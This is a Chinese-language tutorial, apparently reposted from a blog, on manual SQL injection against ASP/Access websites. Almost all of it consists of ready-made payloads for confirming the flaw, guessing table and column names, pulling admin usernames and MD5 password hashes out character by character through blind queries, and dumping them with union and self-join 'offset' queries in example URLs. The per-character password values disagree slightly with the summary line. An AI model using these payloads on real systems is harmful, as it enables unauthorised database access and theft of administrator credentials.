【SQL】access手工注入
1)判斷注入
‘ 出現錯誤 –可能存在注入漏洞
and 1=1 返回正確
and 1=2 返回錯誤 –說明存在注入漏洞
2)判斷數據庫
and (select count(*) from msysobjects)>0 –返回權限不足為access數據庫
and (select count(*) from sysobjects)>0 –返回正常則為MSSQL數據庫
3)猜表名列名
and exists (select * from 表名) –猜測表名
and exists (select 列名 from 表名) –猜測列名
如:
判斷是否存在admin的表:and exists (select * from admin)
判斷是否存在username的列:and exists (select username from admin)
判斷是否存在password的列:and exists (select password from admin)
4)猜解用戶名和密碼長度
and (select top 1 len(列名) from 表名)=X –X代表數字,返回正確代表所猜的列名長度為這個數字
如:
判斷用戶名的長度是否大於零:and (select top 1 len(username) from admin)>0
判斷用戶名的長度是否大於四:and (select top 1 len(username) from admin)>4
判斷用戶名的長度是否大於五:and (select top 1 len(username) from admin)>5
–用戶名一般都是admin,大於四返回正確,當大於五返回出錯,那么他的長度就是5,密碼一般是MD5加密的,所以一般都為16或32位。
5)猜解用戶和密碼的ascii碼
–這里應該采用截半法來提高效率。ascii碼0-126。
這里我們假設用戶為:admin 密碼為:admin888,猜出來的ascii碼用轉換工具轉換下就可以的出明
文
and(select top 1 asc(mid(username,1,1))from admin)>97
and(select top 1 asc(mid(username,1,1))from admin)=97
and(select top 1 asc(mid(username,2,1))from admin)=100
and(select top 1 asc(mid(username,3,1))from admin)=109
and(select top 1 asc(mid(username,4,1))from admin)=105
and(select top 1 asc(mid(username,5,1))from admin)=110
97 100 109 105 110 admin
———————————————————–
and(select top 1 asc(mid(password,1,1))from admin)=52
and(select top 1 asc(mid(password,2,1))from admin)=54
and(select top 1 asc(mid(password,3,1))from admin)=57
and(select top 1 asc(mid(password,4,1))from admin)=56
and(select top 1 asc(mid(password,5,1))from admin)=48
and(select top 1 asc(mid(password,6,1))from admin)=100
and(select top 1 asc(mid(password,7,1))from admin)=51
and(select top 1 asc(mid(password,8,1))from admin)=50
and(select top 1 asc(mid(password,9,1))from admin)=99
and(select top 1 asc(mid(password,10,1))from admin)=48
and(select top 1 asc(mid(password,11,1))from admin)=53
and(select top 1 asc(mid(password,12,1))from admin)=53
and(select top 1 asc(mid(password,13,1))from admin)=57
and(select top 1 asc(mid(password,14,1))from admin)=102
and(select top 1 asc(mid(password,15,1))from admin)=56
and(select top 1 asc(mid(password,16,1))from admin)=32
52 54 57 101 56 48 100 51 50 99 48 53 53 57 102 56 32
469e80d32c0559f8 md5 解出來的密碼是admin888
===================分割線===================
至此,用戶密碼都出來,萬惡的手工結束。
不過是不是有點繁瑣,除了工具,還有方便的聯合查詢方法,繼續:
1)聯合查詢:
order by X –猜字段(X代表數字,返回錯誤代表數字大,直至反正正確代表有多少字段。)
union select 1,2,3,4,5,6….from 表名 有多少字段,數字就寫到多少,爆字段位置
union select 1,列名,3,4,5,6 from 表名 爆列名所含的內容,位置在哪里就寫在哪里
如:
order by 15 錯誤
order by 16 正確 –說明有16個字段
假如表為:admin 列名有:username,password 。
構造的語句為:
http:url.asp?id=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
在爆出的字段位置填入列名,這里假如為6,8。
構造的語句為:
http:url.asp?id=1 union select 1,2,3,4,5,username,7,password,9,10,11,12,13,14,15,16 from admin
===================分割線===================
至此,用戶密碼同樣爆出來了,是不是簡單了。
有時候聯合查詢爆出字段位置,死活猜不到列名,各種神器都砸不出來時,這里就要用到偏移注射,
順便說下:
說明下,注入表的字段數要大於或等於目標列的兩倍。
1)首先要構造這樣子的語句:select * from (admin as a inner join admin as b on a.id=b.id)
幾點說明:
–*代表的字段,如果拓寬會加大username password在可顯示位置的幾率
–(admin as a inner join admin as b on a.id=b.id)是admin表自連接
–id為列,當id列改變則隨之改變
–整句的意思是:admin表記為a,同時也記為b,然后查詢條件是a表的id列與b表的id列相等,返回
所有相等的行,顯然,a,b都是同一個表,當然全部返回啦。
還是舉例說明好:
http://url.asp?id=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
假如有五個表列,則
http://url.asp?id=1 union select 1,2,3,4,5,6,* from (admin as a inner join admin as b on a.id=b.id)
人品不好還是沒爆出來,則
http://url.asp?id=1 union select 1,2,3,4,5,6,a.id,* from (admin as a inner join admin as b on a.id=b.id)
http://url.asp?id=1 union select 1,2,3,4,5,6,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
這時*里的字段排列順序卻被打亂,增加頁面顯示幾率。
如果還沒爆出來,則
http://url.asp?id=1 union select 1,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)
http://url.asp?id=1 union select 1,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)
【注】本文轉自:http://sh4dow.lofter.com/post/395c80_1214862